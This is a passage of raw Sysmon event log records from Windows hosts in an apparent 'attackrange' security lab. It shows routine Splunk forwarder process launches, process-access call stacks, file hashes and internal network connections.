Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.247{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.094{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3CA7694754DD5A65BC1D2BF3C021B84,SHA256=C29F422FC93ED5E918A3083E381DC2A87EE15BB514D30FB1E1600E583238AB00,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:50.203{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57310-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:51.176{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1326FBE87DC4EBA64C1B43E95D42EC91,SHA256=BB90B6CF909E321E32A83415681C01994510626D8B4163B6FC0BFCF4DA980CA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.799{466BC892-F587-60EB-567D-00000000CF01}80289060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.530{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.530{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.516{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591D40465E58F0CBE5D68D54F678D01B,SHA256=79645AAA163EF3C316465F1B25DD245A5E304569F1D4ADB806B583B92E122405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A97593A9225E5F82ED9087A5394EF0C5,SHA256=F80A6FA355F533924E50F380745C05FD052EAE453AF1E367800F0E41AA958CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38178944FD9A681183521F84E8B23334,SHA256=66335BDB9582514E2283D756B825D6383F571935F18B157EC9F11F8AF9D48A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:52.210{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE876CC5218A4D085E28CFEDB0AAED1B,SHA256=28D3328962E4140E25716829889B58565AA2E9986659227EFA5540DFF7336800,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.931{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.916{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.901{466BC892-F588-60EB-587D-00000000CF01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.631{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.531{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591D40465E58F0CBE5D68D54F678D01B,SHA256=79645AAA163EF3C316465F1B25DD245A5E304569F1D4ADB806B583B92E122405,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:44.638{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51077-false10.0.1.12-8000- 10341000x80000000000000001050214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.400{466BC892-F588-60EB-577D-00000000CF01}84086236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 